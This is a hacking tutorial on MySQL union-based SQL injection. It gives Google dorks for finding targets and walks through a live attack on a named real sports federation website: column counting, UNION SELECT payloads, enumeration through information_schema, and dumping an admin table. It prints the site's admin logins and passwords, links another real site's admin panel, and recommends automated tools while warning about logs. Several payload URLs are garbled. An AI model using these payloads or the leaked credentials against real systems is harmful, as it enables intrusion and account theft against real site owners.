You are on page 1of 6

MySQL Injection-FULL LESSON

What is SQL?

SQL injection is probably the most abundant programming flaw that exists on the
internet at present. It is the vulnerability through which unauthorized person can
access the various critical and private dat. SQL injection is not a flaw in the web
or db server but but is a result of the poor and inexperienced programming
practices. And it is one of the deadliest as well as easiest attack to execute from
remote location.
In SQL injection, we interact with DB server with the various commands and get
various data from it. In this tutorial, I would be discussing 3 aspects of SQL
injection namely bypassing logins, accessing the secret data and modifying the page
contents.

3. MySQL

MySQL is a relational database management system (RDBMS) that runs as a server


providing multi-user access to a number of databases. It is named after developer
Michael Widenius daughter, My. The SQL phrase stands for Structured Query Language.

=So the basic what you need to know about SQL and MySQL are done now the real part
begins

4. How to find vulnerability

There many many ways to find vulnerability.Most familiar ways are using the Google
Dorks:

inurl:index.php?id=
inurl:article.php?id=
allinurl:news.php?id=
inurl:shop.php?cat=

Hackers always say "Google is my Best Friend" now you know way without of google we
couldn't do our job so easy.So at the end of this tutorial i'll post a dork list so
am going to save you from searching the internet.

5. Exploiting Mysql vulnerability

So lets start with exploiting our target.For this tutorial i dicided to chose
European Table Tennis Union

Code:
http://www.ettu.org
I have used a dork inurl:news_view.php?id= and i got this link of the site

Code:
http://www.ettu.org/news_view.php?id=2583
So how can we test it is it vuln. on MySQL Injection? - Its simple with adding ' or
% at the and or before the id.Now our vuln. link should look like this

Code:
http://www.ettu.org/news_view.php?id=2583'
Did you notice something was changed?-Yes the content that was previos on the site
was not showed.So this is a sing that this site may be vuln. on MySQL Injection
sometimes will print you a message that says
Code:
Warning: mysql_fetch_assoc(),Warning: mysql_fetch_array(),mysql_num_rows(),mysql
error,mysql_query,mysql_fetch,mysql_connect
In this case doesn't show so we also may be facing with MySQL NoError Injection.How
can we know for sure is it vuln.?-We are going to start typeing

ORDER BY 1 After the ID number

Code:
http://www.ettu.org/news_view.php?id=2583+ORDER+BY+1
So our content is shown agaen.And now we are sure we're facing a site that is vuln.
on MySQLInjection.We continue to incrise the Order Number so we find out how many
columns are there until we get an blan page agaen.

Code:
http://www.ettu.org/news_view.php?id=2583+ORDER+BY+2 <== No blank Page
Code:
http://www.ettu.org/news_view.php?id=2583+ORDER+BY+3 <== No blank Page
Code:
http://www.ettu.org/news_view.php?id=2583+ORDER+BY+4 <== No blank Page
Code:
http://www.ettu.org/news_view.php?id=2583+ORDER+BY+10 <== No blank Page
Code:
http://www.ettu.org/news_view.php?id=2583+ORDER+BY+15 <== No blank Page
Code:
http://www.ettu.org/news_view.php?id=2583+ORDER+BY+16 <== No blank Page
Code:
http://www.ettu.org/news_view.php?id=2583+ORDER+BY+17 <== Blank Page
wOOt!! We now know that there are 16 vuln. columns!!

Now we are going to select them all with this comand UNION SELECT or UNION ALL
SELECT

Code:
http://www.ettu.org/news_view.php?id...,13,14,15,16--
Dont forget to put "--" at the end or it will return an blank page.So the content
loads agaen and lets see witch of these vuln. columns we can use.To do that we add
a '-' before the ID Number

Code:
http://www.ettu.org/news_view.php?id...,13,14,15,16--
So this is very important if you dont do this you cannot continue to do the next
several steps and now it prints us a vuln. columns number 2 and number 4.So this
means that columns with number 2 and 4 are vulnruble and we can use them.To get
Mysql version,User,Databases.

6. Getting Mysql Version

To get MySQL version we use version() or @@version commands to dispaly version of


MySQL Database.So we change 2 into @@version and

Code:
http://www.ettu.org/news_view.php?id...,13,14,15,16--
there is it MySQL Version displayet at the page.

Code:
5.1.37-1ubuntu5.5
So when MySQL Version is 5> we can use information_schema to get data faster but if
version is >5 that means that we need to guess the tables and columns.So we need to
be very lucky to guess the tabale and column.

7. Getting Mysql User

Getting the user is with the user() command

Code:
http://www.ettu.org/news_view.php?id...,13,14,15,16--
Displayed

Code:
ettu_admin@localhost
8. Getting Mysql Databases

So now we need to get the databases with the followed command database()

Code:
http://www.ettu.org/news_view.php?id...,13,14,15,16--
Displayed

Code:
ettu.org_ettu_db01
Sometimes there are more databases so it good to know how many databases there are
and why are they for.Becouse maybe the data we are looking is in the other
database.

9. Getting Mysql Tables

And here we are at the main think.How to find out the table names.

We are going to do this with adding this command

Code:
group_concat(table_name)
at the place of the vun. column and in our case is 2 and with adding at the end of
the number of columns the following command

Code:
FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA41.gifATABASE()
What does this mean?-This means to select Table Names from information_schema where
table schema is from the Database. and when we replace everything we get this link
and this tables:

Code:
http://www.ettu.org/news_view.php?id...2,13,14,15,16+

FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA41.gifATABASE()--
We got a lots of tables but we dont need them all so am going to press Ctrl+F [Find
specific word] and type user,users,admin,members and it turns out that there is a
table with the name

Code:
0910ettucup01_admin
Now we know that there is table with name admin and there must be some username and
passwords but to that we need to find the columns in that table!

10.Getting Mysql Columns

We found out that theres a table admin and now we need to find the columns we need
to change table_name to column_name and

Code:
FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA41.gifATABASE()--

to

FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_SCHEMA41.gifATABASE()--
Now when we change all that we get

Code:
http://www.ettu.org/news_view.php?id...2,13,14,15,16+

FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_SCHEMA41.gifATABASE()--
with executing this we get a lot i mean really a lot of columns name that we dont
need and it may take a while till we find our most needed columns so we are going
to pull out only the columns from our table that we found earlier and that is from
ettu.org_ettu_db01 to do this we need to you MySQL Char How to find it?-Well you
can always use google or you can install on your mozila an addon with name HackBar
there is a MySQL char converter so now am going to convert our table into a Mysql
Char

Code:
CHAR(48, 57, 49, 48, 101, 116, 116, 117, 99, 117, 112, 48, 49, 95, 97, 100, 109,
105, 110)
Now where to put this?-We are going to change our link into:

Code:
http://www.ettu.org/news_view.php?id...2,13,14,15,16+

from+information_schema.columns+where+table_name=C HAR
%2848,%2057,%2049,%2048,%20101,%20116,%20116,

%20117,%2099,%20117,%20112,%2048,%2049,%2095,%2097 ,
%20100,%20109,%20105,%20110%29--
Now are displayed the columns that are in Table 'ADMIN'

Code:
id,login,password,stato,id_squ,girone,abilitato
Our work is almost done.Just to dump usernames and passwords.

11.Getting Information From Columns

To do this we are going to use a command that we are using it all the way till
here.And that is group_concat().All we now need to do is to change column_name into
our ectual column names and that are "login,password,id,stato ect" So lets see how
ill it looks

Code:
http://www.ettu.org/news_view.php?id...2,13,14,15,16+
from+0910ettucup01_admin--
Damn the usernames and passwords are displayed at the site.So let explain here what
we have done.We have changed information_schema.columns into the table name 'cuz we
dont need not to read the columns 'cuz we already put them into the group_concat()
you see id login password those are columns now from where to be selected from the
table name 0910ettucup01_admin and now we have our login details:

Code:
1:adminvitesse:vitesse2006

2:admin:matchvitesse
All it left now is to find the Admin Panel....

12.Finding Admin Panel

Unfortunatly our live example site doesn't have an admin panel so for this to show
you i'll took another site.So when you got the admin details we need to login
somewhere that somewhere is called Admin Panel or ControlPanel or WebPanel its same
or you can say it Login Page.To find an login page you can use many tools ill tell
you some in the next part.An example of an login page

Code:
http://www.discountexpress.co.uk/admin/
There you can enter the login info and get into the site and change alot

13.Tools

So tools,there aren't so much tools to use when your doing this but there are a few
that will help you a lot.

13.1.Admin Finder

Admin finder is a tool that helps you to find the admin page or Login Page very
quick for this you can use many online or you can use some webscanner to find
it.Here are 1 Good program and one good Online Scanner

Online Admin Page Scanner

And for download

Acunetix Web Vulnerability Scanner

=>This scanner could be used for more things but now we are not going to talk about
them

13.2 Hacking Tools that are making you're work easier

Well we all know that some of you have started with tools ex.Havij or MySQL
Helper.Yes they are good in hand expecialy when we are hacking into a MySQL Server
>5 that are guessing the table and column names so that is realy good also Havij is
a great program that have Admin Finder too and MD5 Section where you can easly
search about 10-12 MD5 Decripting sites so yes its realy good program but dont use
it for hacking all the way into the server 'cuz it leaves a lotz of logs and you my
be finish in jail
14.Greetz